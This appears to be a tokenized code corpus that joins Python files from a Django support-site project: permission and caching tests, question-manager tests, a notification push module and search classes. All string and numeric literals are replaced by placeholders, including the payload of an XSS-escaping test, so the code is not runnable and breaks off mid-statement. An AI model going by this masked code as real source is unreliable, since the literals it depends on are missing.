        self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, '<STR_LIT:name>')]), ['<STR_LIT>'])
        self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, '<STR_LIT:name>')] for include in patterns if hasattr(include, '<STR_LIT>')], [['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']])
        api = Api(api_name='<STR_LIT>')
        api.register(NoteResource())
        api.register(UserResource())
        patterns = api.urls
        self.assertEqual(len(patterns), <NUM_LIT:3>)
        self.assertEqual(sorted([pattern.name for pattern in patterns if hasattr(pattern, '<STR_LIT:name>')]), ['<STR_LIT>'])
        self.assertEqual([[pattern.name for pattern in include.url_patterns if hasattr(pattern, '<STR_LIT:name>')] for include in patterns if hasattr(include, '<STR_LIT>')], [['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']])

    def test_top_level(self):
        """Plain top-level request returns 200 with the expected body."""
        api = Api()
        api.register(NoteResource())
        api.register(UserResource())
        request = HttpRequest()
        resp = api.top_level(request)
        self.assertEqual(resp.status_code, <NUM_LIT:200>)
        self.assertEqual(resp.content, '<STR_LIT>')

    def test_top_level_jsonp(self):
        """JSONP: a valid callback wraps the response; an invalid callback
        raises BadRequest."""
        api = Api()
        api.register(NoteResource())
        api.register(UserResource())
        request = HttpRequest()
        request.META = {'<STR_LIT>': '<STR_LIT>'}
        request.GET = {'<STR_LIT>': '<STR_LIT:foo>'}
        resp = api.top_level(request)
        self.assertEqual(resp.status_code, <NUM_LIT:200>)
        self.assertEqual(resp['<STR_LIT>'].split('<STR_LIT:;>')[<NUM_LIT:0>], '<STR_LIT>')
        self.assertEqual(resp.content, '<STR_LIT>')
        request = HttpRequest()
        request.META = {'<STR_LIT>': '<STR_LIT>'}
        request.GET = {'<STR_LIT>': '<STR_LIT>'}
        try:
            resp = api.top_level(request)
            self.fail("<STR_LIT>")
        except BadRequest:
            pass
<s> import os <EOL> import sys <EOL> from os . path import abspath , dirname , join <EOL> from django . core . management import execute_manager <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> try : <EOL> import settings_related as settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> from django . conf import settings <EOL> from django . contrib . auth . models import Permission as DjangoPermission <EOL> from django . contrib . auth . models import Group <EOL> from django . test import TestCase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> import authority <EOL> from authority import permissions <EOL> from authority . models import Permission <EOL> from authority . exceptions import NotAModel , UnsavedModelInstance <EOL> from authority . compat import get_user_model <EOL> from authority . forms import UserPermissionForm <EOL> from kitsune . users . tests import UserFactory <EOL> User = get_user_model ( ) <EOL> class UserPermission ( permissions . BasePermission ) : <EOL> checks = ( '<STR_LIT>' , ) <EOL> label = '<STR_LIT>' <EOL> authority . register ( User , UserPermission ) <EOL> class GroupPermission ( permissions . BasePermission ) : <EOL> checks = ( '<STR_LIT>' , ) <EOL> label = '<STR_LIT>' <EOL> authority . register ( Group , GroupPermission ) <EOL> class DjangoPermissionChecksTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_no_permission ( self ) : <EOL> self . assertFalse ( self . check . add_user ( ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertFalse ( self . check . delete_user ( self . user ) ) <EOL> def test_add ( self ) : <EOL> perm = DjangoPermission . objects . get ( codename = '<STR_LIT>' ) <EOL> self . user . user_permissions . add ( perm ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> perm = Permission ( <EOL> user = self . user , <EOL> content_object = self . user , <EOL> codename = '<STR_LIT>' , <EOL> approved = True <EOL> ) <EOL> perm . save ( ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . 
user ) ) <EOL> class AssignBehaviourTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_add ( self ) : <EOL> result = self . check . assign ( check = '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , DjangoPermission ) ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> result = self . check . assign ( <EOL> content_object = self . user , <EOL> check = '<STR_LIT>' , <EOL> ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , Permission ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> def test_all ( self ) : <EOL> result = self . check . assign ( content_object = self . user ) <EOL> self . assertTrue ( isinstance ( result , list ) ) <EOL> self . assertTrue ( self . check . browse_user ( self . user ) ) <EOL> self . assertTrue ( self . check . delete_user ( self . user ) ) <EOL> self . assertTrue ( self . check . add_user ( self . user ) ) <EOL> self . assertTrue ( self . check . change_user ( self . user ) ) <EOL> class GenericAssignBehaviourTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_add ( self ) : <EOL> result = self . check . assign ( check = '<STR_LIT>' , generic = True ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , DjangoPermission ) ) <EOL> self . assertTrue ( self . check . add_user ( ) ) <EOL> def test_delete ( self ) : <EOL> result = self . check . assign ( <EOL> content_object = self . user , <EOL> check = '<STR_LIT>' , <EOL> generic = True , <EOL> ) <EOL> self . assertTrue ( isinstance ( result [ <NUM_LIT:0> ] , Permission ) ) <EOL> self . assertFalse ( self . check . delete_user ( ) ) <EOL> self . assertTrue ( self . 
check . delete_user ( self . user ) ) <EOL> class AssignExceptionsTest ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . check = UserPermission ( self . user ) <EOL> def test_unsaved_model ( self ) : <EOL> try : <EOL> self . check . assign ( content_object = User ( ) ) <EOL> except UnsavedModelInstance : <EOL> return True <EOL> self . fail ( ) <EOL> def test_not_model_content_object ( self ) : <EOL> try : <EOL> self . check . assign ( content_object = '<STR_LIT>' ) <EOL> except NotAModel : <EOL> return True <EOL> self . fail ( ) <EOL> class SmartCachingTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . user = UserFactory ( ) <EOL> self . group = Group . objects . create ( ) <EOL> self . group . user_set . add ( self . user ) <EOL> self . user_check = UserPermission ( user = self . user ) <EOL> self . group_check = GroupPermission ( group = self . group ) <EOL> settings . AUTHORITY_USE_SMART_CACHE = True <EOL> def tearDown ( self ) : <EOL> ContentType . objects . clear_cache ( ) <EOL> def _old_user_permission_check ( self ) : <EOL> return Permission . objects . user_permissions ( <EOL> self . user , <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> def _old_group_permission_check ( self ) : <EOL> return Permission . objects . group_permissions ( <EOL> self . group , <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> approved = True , <EOL> ) <EOL> class PerformanceTest ( SmartCachingTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_has_user_perms ( self ) : <EOL> assert not self . user . is_superuser <EOL> assert self . user . is_active <EOL> with self . assertNumQueries ( <NUM_LIT:3> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . 
user , <EOL> True , <EOL> False , <EOL> ) <EOL> def test_group_has_perms ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:2> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> def test_has_user_perms_check_group ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:3> ) : <EOL> self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> def test_invalidate_user_permissions_cache ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:6> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> True , <EOL> False , <EOL> ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> ContentType . objects . clear_cache ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> True , <EOL> False , <EOL> ) <EOL> def test_invalidate_group_permissions_cache ( self ) : <EOL> with self . assertNumQueries ( <NUM_LIT:4> ) : <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> self . group_check . invalidate_permissions_cache ( ) <EOL> ContentType . objects . clear_cache ( ) <EOL> for _ in range ( <NUM_LIT:5> ) : <EOL> assert not self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> True , <EOL> ) <EOL> def test_has_user_perms_check_group_multiple ( self ) : <EOL> Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> with self . 
assertNumQueries ( <NUM_LIT:2> ) : <EOL> assert self . user_check . has_user_perms ( '<STR_LIT:foo>' , self . user , True , True ) <EOL> new_group = Group . objects . create ( name = '<STR_LIT>' ) <EOL> new_group . user_set . add ( self . user ) <EOL> Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = new_group , <EOL> approved = True , <EOL> ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> with self . assertNumQueries ( <NUM_LIT:2> ) : <EOL> assert self . user_check . has_user_perms ( '<STR_LIT:foo>' , self . user , True , True ) <EOL> class GroupPermissionCacheTestCase ( SmartCachingTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_has_user_perms_with_groups ( self ) : <EOL> perms = self . _old_user_permission_check ( ) <EOL> self . assertEqual ( [ ] , list ( perms ) ) <EOL> can_foo_with_group = self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> self . assertFalse ( can_foo_with_group ) <EOL> perm = Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( User ) , <EOL> object_id = self . user . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> perms = self . _old_user_permission_check ( ) <EOL> self . assertEqual ( [ perm ] , list ( perms ) ) <EOL> self . user_check . invalidate_permissions_cache ( ) <EOL> can_foo_with_group = self . user_check . has_user_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> check_groups = True , <EOL> ) <EOL> self . assertTrue ( can_foo_with_group ) <EOL> def test_has_group_perms_no_user ( self ) : <EOL> can_foo_with_group = self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . user , <EOL> approved = True , <EOL> ) <EOL> self . 
assertFalse ( can_foo_with_group ) <EOL> perms = self . _old_group_permission_check ( ) <EOL> self . assertEqual ( [ ] , list ( perms ) ) <EOL> perm = Permission . objects . create ( <EOL> content_type = Permission . objects . get_content_type ( Group ) , <EOL> object_id = self . group . pk , <EOL> codename = '<STR_LIT:foo>' , <EOL> group = self . group , <EOL> approved = True , <EOL> ) <EOL> perms = self . _old_group_permission_check ( ) <EOL> self . assertEqual ( [ perm ] , list ( perms ) ) <EOL> self . group_check . invalidate_permissions_cache ( ) <EOL> can_foo_with_group = self . group_check . has_group_perms ( <EOL> '<STR_LIT:foo>' , <EOL> self . group , <EOL> approved = True , <EOL> ) <EOL> self . assertTrue ( can_foo_with_group ) </s>
<s> from nose . tools import eq_ <EOL> from pyquery import PyQuery as pq <EOL> from kitsune . sumo . templatetags . jinja_helpers import urlparams <EOL> from kitsune . sumo . tests import LocalizingClient <EOL> from kitsune . sumo . urlresolvers import reverse <EOL> from kitsune . search . tests import ElasticTestCase <EOL> class TopContributorsNewTests ( ElasticTestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = LocalizingClient <EOL> def test_it_works ( self ) : <EOL> url = reverse ( '<STR_LIT>' , args = [ '<STR_LIT>' ] ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) <EOL> def test_no_xss ( self ) : <EOL> bad_string = '<STR_LIT>' <EOL> good_string = '<STR_LIT>' <EOL> url = reverse ( '<STR_LIT>' , args = [ '<STR_LIT>' ] ) <EOL> url = urlparams ( url , locale = bad_string ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) <EOL> doc = pq ( res . content ) <EOL> target = doc ( '<STR_LIT>' ) <EOL> assert bad_string not in target . html ( ) <EOL> assert good_string in target . html ( ) <EOL> class ContributorsMetricsTests ( ElasticTestCase ) : <EOL> """<STR_LIT>""" <EOL> client_class = LocalizingClient <EOL> def test_it_works ( self ) : <EOL> url = reverse ( '<STR_LIT>' ) <EOL> res = self . client . get ( url ) <EOL> eq_ ( res . status_code , <NUM_LIT:200> ) </s>
<s> import django_filters <EOL> from rest_framework import generics <EOL> from rest_framework . relations import SlugRelatedField <EOL> from rest_framework . serializers import ModelSerializer <EOL> from kitsune . dashboards . models import WikiMetric <EOL> from kitsune . products . models import Product <EOL> class WikiMetricSerializer ( ModelSerializer ) : <EOL> product = SlugRelatedField ( <EOL> slug_field = '<STR_LIT>' , <EOL> queryset = Product . objects . all ( ) ) <EOL> class Meta : <EOL> model = WikiMetric <EOL> fields = ( '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:date>' , '<STR_LIT:value>' ) <EOL> class ProductFilter ( django_filters . Filter ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , qs , value ) : <EOL> if value is None : <EOL> return qs <EOL> if value == '<STR_LIT>' or value == '<STR_LIT:null>' : <EOL> return qs . filter ( product = None ) <EOL> return qs . filter ( product__slug = value ) <EOL> class WikiMetricFilterSet ( django_filters . FilterSet ) : <EOL> """<STR_LIT>""" <EOL> product = ProductFilter ( ) <EOL> class Meta : <EOL> model = WikiMetric <EOL> fields = [ '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class WikiMetricList ( generics . ListAPIView ) : <EOL> """<STR_LIT>""" <EOL> queryset = WikiMetric . objects . all ( ) <EOL> serializer_class = WikiMetricSerializer <EOL> filter_class = WikiMetricFilterSet </s>
<s> THREADS_PER_PAGE = <NUM_LIT:20> <EOL> POSTS_PER_PAGE = <NUM_LIT:20> </s>
<s> import factory <EOL> from kitsune . gallery . models import Image , Video <EOL> from kitsune . sumo . tests import FuzzyUnicode <EOL> from kitsune . users . tests import UserFactory <EOL> class ImageFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Image <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> description = FuzzyUnicode ( ) <EOL> file = factory . django . ImageField ( ) <EOL> title = FuzzyUnicode ( ) <EOL> class VideoFactory ( factory . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Video <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> webm = factory . django . FileField ( from_path = '<STR_LIT>' ) <EOL> ogv = factory . django . FileField ( from_path = '<STR_LIT>' ) <EOL> flv = factory . django . FileField ( from_path = '<STR_LIT>' ) </s>
<s> from django . contrib import admin <EOL> from kitsune . journal . models import Record <EOL> class RecordAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:src>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> list_filter = ( '<STR_LIT:src>' , ) <EOL> admin . site . register ( Record , RecordAdmin ) </s>
<s> import time <EOL> from nose . tools import eq_ <EOL> from pyquery import PyQuery as pq <EOL> from kitsune . kbforums . feeds import ThreadsFeed , PostsFeed <EOL> from kitsune . kbforums . tests import KBForumTestCase , get , ThreadFactory <EOL> from kitsune . wiki . tests import DocumentFactory <EOL> class FeedSortingTestCase ( KBForumTestCase ) : <EOL> def test_threads_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> d = DocumentFactory ( ) <EOL> t = ThreadFactory ( document = d ) <EOL> t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> t2 = ThreadFactory ( document = d ) <EOL> t2 . new_post ( creator = t2 . creator , content = '<STR_LIT:foo>' ) <EOL> given_ = ThreadsFeed ( ) . items ( d ) [ <NUM_LIT:0> ] . id <EOL> eq_ ( t2 . id , given_ ) <EOL> def test_posts_sort ( self ) : <EOL> """<STR_LIT>""" <EOL> t = ThreadFactory ( ) <EOL> t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> p2 = t . new_post ( creator = t . creator , content = '<STR_LIT:foo>' ) <EOL> given_ = PostsFeed ( ) . items ( t ) [ <NUM_LIT:0> ] . id <EOL> eq_ ( p2 . id , given_ ) <EOL> def test_multi_feed_titling ( self ) : <EOL> """<STR_LIT>""" <EOL> d = DocumentFactory ( ) <EOL> response = get ( self . client , '<STR_LIT>' , args = [ d . slug ] ) <EOL> doc = pq ( response . content ) <EOL> given_ = doc ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . attrib [ '<STR_LIT:title>' ] <EOL> exp_ = ThreadsFeed ( ) . title ( d ) <EOL> eq_ ( exp_ , given_ ) </s>
<s> from collections import namedtuple <EOL> import json <EOL> import os <EOL> Language = namedtuple ( u'<STR_LIT>' , u'<STR_LIT>' ) <EOL> file = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> locales = json . loads ( open ( file , '<STR_LIT:r>' ) . read ( ) ) <EOL> LOCALES = { } <EOL> for k in locales : <EOL> LOCALES [ k ] = Language ( locales [ k ] [ '<STR_LIT>' ] , locales [ k ] [ '<STR_LIT>' ] , <EOL> locales [ k ] [ '<STR_LIT>' ] ) </s>
<s> import logging <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . db . models import Q <EOL> import actstream . registry <EOL> import simplejson <EOL> import requests <EOL> from actstream . models import Action , Follow <EOL> from celery import task <EOL> from multidb . pinning import use_master <EOL> from requests . exceptions import RequestException <EOL> from kitsune . notifications . models import ( <EOL> Notification , RealtimeRegistration , PushNotificationRegistration ) <EOL> from kitsune . notifications . decorators import notification_handler , notification_handlers <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> def _ct_query ( object , actor_only = None , ** kwargs ) : <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> if actor_only is not None : <EOL> kwargs [ '<STR_LIT>' ] = actor_only <EOL> return Q ( content_type = ct . pk , object_id = object . pk , ** kwargs ) <EOL> def _full_ct_query ( action , actor_only = None ) : <EOL> """<STR_LIT>""" <EOL> actstream . registry . check ( action . actor ) <EOL> query = _ct_query ( action . actor ) <EOL> if action . target is not None : <EOL> actstream . registry . check ( action . target ) <EOL> query |= _ct_query ( action . target , actor_only ) <EOL> if action . action_object is not None : <EOL> actstream . registry . check ( action . action_object ) <EOL> query |= _ct_query ( action . action_object , actor_only ) <EOL> return query <EOL> def _send_simple_push ( endpoint , version , max_retries = <NUM_LIT:3> , _retry_count = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> r = requests . put ( endpoint , '<STR_LIT>' . format ( version ) ) <EOL> except RequestException as e : <EOL> if _retry_count < max_retries : <EOL> return _send_simple_push ( endpoint , version , max_retries , _retry_count + <NUM_LIT:1> ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , e ) <EOL> return <EOL> if r . 
status_code >= <NUM_LIT> : <EOL> try : <EOL> data = r . json ( ) <EOL> except simplejson . scanner . JSONDecodeError : <EOL> logger . error ( '<STR_LIT>' , r . status_code , r . text ) <EOL> return <EOL> if r . status_code == <NUM_LIT> and data [ '<STR_LIT>' ] == <NUM_LIT> and _retry_count < max_retries : <EOL> return _send_simple_push ( endpoint , version , max_retries , _retry_count + <NUM_LIT:1> ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , r . status_code , r . json ( ) ) <EOL> @ task ( ignore_result = True ) <EOL> @ use_master <EOL> def add_notification_for_action ( action_id ) : <EOL> action = Action . objects . get ( id = action_id ) <EOL> query = _full_ct_query ( action , actor_only = False ) <EOL> query &= ~ Q ( user = action . actor ) <EOL> users_to_notify = set ( f . user for f in Follow . objects . filter ( query ) ) <EOL> for u in users_to_notify : <EOL> Notification . objects . create ( owner = u , action = action ) <EOL> @ task ( ignore_result = True ) <EOL> @ use_master <EOL> def send_realtimes_for_action ( action_id ) : <EOL> action = Action . objects . get ( id = action_id ) <EOL> query = _full_ct_query ( action ) <EOL> query &= ~ Q ( creator = action . actor ) <EOL> registrations = RealtimeRegistration . objects . filter ( query ) <EOL> for reg in registrations : <EOL> _send_simple_push ( reg . endpoint , action . id ) <EOL> @ task ( ignore_result = True ) <EOL> def send_notification ( notification_id ) : <EOL> """<STR_LIT>""" <EOL> notification = Notification . objects . get ( id = notification_id ) <EOL> for handler in notification_handlers : <EOL> handler ( notification ) <EOL> @ notification_handler <EOL> def simple_push ( notification ) : <EOL> """<STR_LIT>""" <EOL> registrations = PushNotificationRegistration . objects . filter ( creator = notification . owner ) <EOL> for reg in registrations : <EOL> _send_simple_push ( reg . push_url , notification . id ) </s>
<s> from django . contrib import admin <EOL> from kitsune . questions . models import QuestionLocale <EOL> class QuestionLocaleAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> filter_horizontal = ( '<STR_LIT>' , ) <EOL> admin . site . register ( QuestionLocale , QuestionLocaleAdmin ) </s>
<s> from nose . tools import eq_ <EOL> from kitsune . questions import config <EOL> from kitsune . questions . models import Question , Answer <EOL> from kitsune . questions . tests import AnswerFactory , QuestionFactory <EOL> from kitsune . sumo . tests import TestCase <EOL> from kitsune . tags . tests import TagFactory <EOL> class QuestionManagerTestCase ( TestCase ) : <EOL> def test_done ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . done ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . done ( ) . count ( ) ) <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . done ( ) . count ( ) ) <EOL> QuestionFactory ( is_locked = True ) <EOL> eq_ ( <NUM_LIT:2> , Question . objects . done ( ) . count ( ) ) <EOL> def test_responded ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( creator = q . creator , question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . responded ( ) . count ( ) ) <EOL> q . is_locked = True <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> q . is_locked = False <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . responded ( ) . count ( ) ) <EOL> def test_needs_attention ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> a = AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . 
count ( ) ) <EOL> a = AnswerFactory ( creator = q . creator , question = q ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> q . is_locked = True <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> q . is_locked = False <EOL> q . solution = a <EOL> q . save ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_attention ( ) . count ( ) ) <EOL> def test_needs_info ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_info ( ) . count ( ) ) <EOL> q . set_needs_info ( ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . needs_info ( ) . count ( ) ) <EOL> q . unset_needs_info ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . needs_info ( ) . count ( ) ) <EOL> def test_escalated ( self ) : <EOL> """<STR_LIT>""" <EOL> t = TagFactory ( name = config . ESCALATE_TAG_NAME , slug = config . ESCALATE_TAG_NAME ) <EOL> q = QuestionFactory ( ) <EOL> eq_ ( <NUM_LIT:0> , Question . objects . escalated ( ) . count ( ) ) <EOL> q . tags . add ( t ) <EOL> eq_ ( <NUM_LIT:1> , Question . objects . escalated ( ) . count ( ) ) <EOL> class AnswerManagerTestCase ( TestCase ) : <EOL> def test_not_by_asker ( self ) : <EOL> """<STR_LIT>""" <EOL> q = QuestionFactory ( ) <EOL> AnswerFactory ( question = q , creator = q . creator ) <EOL> eq_ ( <NUM_LIT:0> , Answer . objects . not_by_asker ( ) . count ( ) ) <EOL> AnswerFactory ( question = q ) <EOL> eq_ ( <NUM_LIT:1> , Answer . objects . not_by_asker ( ) . count ( ) ) </s>
<s> import datetime <EOL> import logging <EOL> from threading import local <EOL> from django . conf import settings <EOL> from django . core import signals <EOL> from django . db import models <EOL> from django . db . models . signals import pre_delete , post_save , m2m_changed <EOL> from django . dispatch import receiver <EOL> from elasticutils . contrib . django import MappingType , Indexable , MLT <EOL> from elasticsearch . exceptions import NotFoundError <EOL> from kitsune . search import es_utils <EOL> from kitsune . search . tasks import index_task , unindex_task <EOL> from kitsune . sumo . models import ModelBase <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> _search_mapping_types = { } <EOL> def get_mapping_types ( mapping_types = None ) : <EOL> """<STR_LIT>""" <EOL> if mapping_types is None : <EOL> values = _search_mapping_types . values ( ) <EOL> else : <EOL> values = [ _search_mapping_types [ name ] for name in mapping_types ] <EOL> values . sort ( key = lambda cls : cls . get_mapping_type_name ( ) ) <EOL> return values <EOL> _local = local ( ) <EOL> def _local_tasks ( ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( _local , '<STR_LIT>' , None ) is None : <EOL> _local . tasks = set ( ) <EOL> return _local . tasks <EOL> class SearchMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_mapping_type ( cls ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def index_later ( self ) : <EOL> """<STR_LIT>""" <EOL> _local_tasks ( ) . add ( ( index_task . delay , <EOL> ( self . get_mapping_type ( ) , ( self . pk , ) ) ) ) <EOL> def unindex_later ( self ) : <EOL> """<STR_LIT>""" <EOL> _local_tasks ( ) . add ( ( unindex_task . delay , <EOL> ( self . get_mapping_type ( ) , ( self . pk , ) ) ) ) <EOL> class SearchMappingType ( MappingType , Indexable ) : <EOL> """<STR_LIT>""" <EOL> list_keys = [ ] <EOL> @ classmethod <EOL> def search ( cls ) : <EOL> return es_utils . 
Sphilastic ( cls ) <EOL> @ classmethod <EOL> def get_index ( cls ) : <EOL> return es_utils . write_index ( cls . get_index_group ( ) ) <EOL> @ classmethod <EOL> def get_index_group ( cls ) : <EOL> return '<STR_LIT:default>' <EOL> @ classmethod <EOL> def get_query_fields ( cls ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def get_localized_fields ( cls ) : <EOL> return [ ] <EOL> @ classmethod <EOL> def get_indexable ( cls ) : <EOL> return cls . get_model ( ) . objects . order_by ( '<STR_LIT>' ) . values_list ( <EOL> '<STR_LIT>' , flat = True ) <EOL> @ classmethod <EOL> def reshape ( cls , results ) : <EOL> """<STR_LIT>""" <EOL> list_keys = cls . list_keys <EOL> return [ <EOL> dict ( ( key , ( val if key in list_keys else val [ <NUM_LIT:0> ] ) ) <EOL> for key , val in result . items ( ) ) <EOL> for result in results <EOL> ] <EOL> @ classmethod <EOL> def index ( cls , * args , ** kwargs ) : <EOL> if not settings . ES_LIVE_INDEXING : <EOL> return <EOL> super ( SearchMappingType , cls ) . index ( * args , ** kwargs ) <EOL> @ classmethod <EOL> def unindex ( cls , * args , ** kwargs ) : <EOL> if not settings . 